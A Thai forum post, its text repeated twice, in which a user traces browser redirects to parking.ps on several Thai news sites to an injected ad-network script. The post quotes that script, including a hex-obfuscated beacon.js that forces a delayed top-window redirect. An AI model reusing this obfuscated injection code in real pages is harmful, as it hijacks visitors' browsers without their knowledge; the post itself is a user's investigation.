มีหลายเว็บเลยครับ ที่เปิดไปสักพักมันก็ redirect ไปที่ parking.ps
ใครเป็นบ้าง?
manager.co.th
dek-d.com
pantip.com
เท่าที่ดูมันไม่ได้เป็นที่เครื่อง ไม่ได้เป็นที่ browser
แต่ script ที่ทำให้ browser เกิดการ redirect ถูกส่งมาจาก internet ครับ
พอดีลองดัก traffic ที่ gateway ดู
ปรากฏว่า packet ก้อนนี้มันมาจากฝั่ง internet ครับ
ซึ่งเท่าที่ไล่ดูคร่าวๆ มันเรียกตามลำดับดังนี้ครับ
<script type="text/javascript" src="http://cdn.innity.com/network.js"></script>
code บรรทัดนี้ถูกแทรกเข้ามาเองครับ หลังจาก browser request code ของ website หน้านั้นๆ
ซึ่งเมื่อมัน execute แล้วจะได้ url นี้ครับ
http://as.innity.com/synd/?cb=1378282651167&pub=71f6278d140af599e06ad9bf1ba03cb0&zone=25685&output=js
หลังจากนั้น เมื่อ browser เข้าไปยัง URL นี้ก็จะได้โค้ดด้านล่างมา
innity_pub='1291';document.write('<script>var _comscore = _comscore || [];_comscore.push({ c1: "8", c2: "6299460", c3: "1000000000000000003" });(function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s, el);})();</script>');document.write('<script>var _innity = _innity || {};_innity.nw = _innity.nw || [];_innity.nw.push({pub: "1291", zone: "25685"});(function() {var _ia = document.createElement("script"), el = document.getElementsByTagName("script")[0];_ia.async = true;_ia.src = ("https:" == document.location.protocol ? "https://4926-cdn-media-innity-net.voxcdn.com/lib" : "http://cdn.innity.net") + "/analytics.js";el.parentNode.insertBefore(_ia, el);})();</script>');document.write('<script>function _emTrack() { try { _emImg = document.createElement("img"); _emImg.style.width = "1px"; _emImg.style.height = "1px"; _emImg.src = "//n.effectivemeasure.net/emnb_18_25685.gif?r=1277208235"; document.body.appendChild(_emImg); } catch(e) {} } if(typeof window.innityem == "undefined") { if(window.addEventListener) { window.addEventListener("load", _emTrack, false); }else { window.attachEvent("onload", _emTrack); } window.innityem = true; }</script>');
ซึ่งโค้ดนี้ก็จะโหลด beacon.js มา
ซึ่งมีเนื้อหาตามด้านล่างนี้
//<![CDATA[
if(!fxpr) { var fxpr = 1; function __x(zz) { var _0xede9=["\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x51\x52\x33\x48\x32\x27\x3B", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72"]; setTimeout(_0xede9[0],Math[_0xede9[2]]((Math[_0xede9[1]]()*54321)+zz)); } function vl1() { top.location = 'http://goo.gl/QBwtIl'; } __x(1234); }
//]]>
หลังจากนั้น browser ก็จะ redirect ไปที่ parking.ps
ผมสงสัยจริงๆ ว่าโค้ดบรรทัดนี้มันมาจากไหนครับ?

<script type="text/javascript" src="
http://cdn.innity.com/network.js"></script>
พบปัญหาเมื่อเปิดเว็บแล้ว Browser redirect ไปที่ parking.ps
ใครเป็นบ้าง?
manager.co.th
dek-d.com
pantip.com
เท่าที่ดูมันไม่ได้เป็นที่เครื่อง ไม่ได้เป็นที่ browser
แต่ script ที่ทำให้ browser เกิดการ redirect ถูกส่งมาจาก internet ครับ
พอดีลองดัก traffic ที่ gateway ดู
ปรากฏว่า packet ก้อนนี้มันมาจากฝั่ง internet ครับ
ซึ่งเท่าที่ไล่ดูคร่าวๆ มันเรียกตามลำดับดังนี้ครับ
<script type="text/javascript" src="http://cdn.innity.com/network.js"></script>
code บรรทัดนี้ถูกแทรกเข้ามาเองครับ หลังจาก browser request code ของ website หน้านั้นๆ
ซึ่งเมื่อมัน execute แล้วจะได้ url นี้ครับ
http://as.innity.com/synd/?cb=1378282651167&pub=71f6278d140af599e06ad9bf1ba03cb0&zone=25685&output=js
หลังจากนั้น เมื่อ browser เข้าไปยัง URL นี้ก็จะได้โค้ดด้านล่างมา
innity_pub='1291';document.write('<script>var _comscore = _comscore || [];_comscore.push({ c1: "8", c2: "6299460", c3: "1000000000000000003" });(function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s, el);})();</script>');document.write('<script>var _innity = _innity || {};_innity.nw = _innity.nw || [];_innity.nw.push({pub: "1291", zone: "25685"});(function() {var _ia = document.createElement("script"), el = document.getElementsByTagName("script")[0];_ia.async = true;_ia.src = ("https:" == document.location.protocol ? "https://4926-cdn-media-innity-net.voxcdn.com/lib" : "http://cdn.innity.net") + "/analytics.js";el.parentNode.insertBefore(_ia, el);})();</script>');document.write('<script>function _emTrack() { try { _emImg = document.createElement("img"); _emImg.style.width = "1px"; _emImg.style.height = "1px"; _emImg.src = "//n.effectivemeasure.net/emnb_18_25685.gif?r=1277208235"; document.body.appendChild(_emImg); } catch(e) {} } if(typeof window.innityem == "undefined") { if(window.addEventListener) { window.addEventListener("load", _emTrack, false); }else { window.attachEvent("onload", _emTrack); } window.innityem = true; }</script>');
ซึ่งโค้ดนี้ก็จะโหลด beacon.js มา
ซึ่งมีเนื้อหาตามด้านล่างนี้
//<![CDATA[
if(!fxpr) { var fxpr = 1; function __x(zz) { var _0xede9=["\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x51\x52\x33\x48\x32\x27\x3B", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72"]; setTimeout(_0xede9[0],Math[_0xede9[2]]((Math[_0xede9[1]]()*54321)+zz)); } function vl1() { top.location = 'http://goo.gl/QBwtIl'; } __x(1234); }
//]]>
หลังจากนั้น browser ก็จะ redirect ไปที่ parking.ps
ผมสงสัยจริงๆ ว่าโค้ดบรรทัดนี้มันมาจากไหนครับ?
<script type="text/javascript" src="http://cdn.innity.com/network.js"></script>